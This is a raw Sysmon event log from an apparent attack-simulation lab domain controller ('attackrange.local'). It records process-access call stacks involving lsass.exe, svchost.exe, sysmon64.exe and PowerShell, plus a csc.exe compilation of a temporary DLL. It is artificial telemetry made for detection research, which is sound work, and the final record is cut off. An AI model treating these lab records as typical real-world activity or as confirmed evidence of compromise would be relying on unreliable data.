10:39:15.437{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000160Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.localDLL2020-10-09 10:39:15.061{733EE690-3DD2-5F80-F502-000000007E01}2428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\mlg1nete.dll2020-10-09 10:39:14.921 10341000x8000000000000000159Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.061{733EE690-3DD2-5F80-F002-000000007E01}47364856C:\Windows\system32\conhost.exe{733EE690-3DD3-5F80-F602-000000007E01}4820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000158Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.046{733EE690-3C5B-5F80-0500-000000007E01}640764C:\Windows\system32\csrss.exe{733EE690-3DD3-5F80-F602-000000007E01}4820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000157Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.046{733EE690-3DD2-5F80-F502-000000007E01}24281192C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{733EE690-3DD3-5F80-F602-000000007E01}4820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000156Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.046{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000155Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.046{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000154Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.046{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000153Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.046{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000152Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.046{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000151Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.046{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000150Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.046{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000149Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.046{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000148Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.046{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000147Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.056{733EE690-3DD3-5F80-F602-000000007E01}4820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESCE44.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC702E4A9180224E4BA24635B343ACABB3.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD2-5F80-EE26-110000000000}0x1126ee0HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{733EE690-3DD2-5F80-F502-000000007E01}2428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\mlg1nete.cmdline" 10341000x8000000000000000146Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.046{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000145Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.046{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000144Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.046{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000348Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.984{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3DD4-5F80-0203-000000007E01}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000347Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.984{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3DD4-5F80-0203-000000007E01}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000346Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.952{733EE690-3DD4-5F80-0203-000000007E01}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_d1hjhxcr.khx.ps12020-10-09 10:39:16.952 10341000x8000000000000000345Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.937{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD4-5F80-0203-000000007E01}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000344Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.921{733EE690-3DD4-5F80-0003-000000007E01}43881144C:\Windows\system32\conhost.exe{733EE690-3DD4-5F80-0203-000000007E01}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000343Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000342Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000341Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000340Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 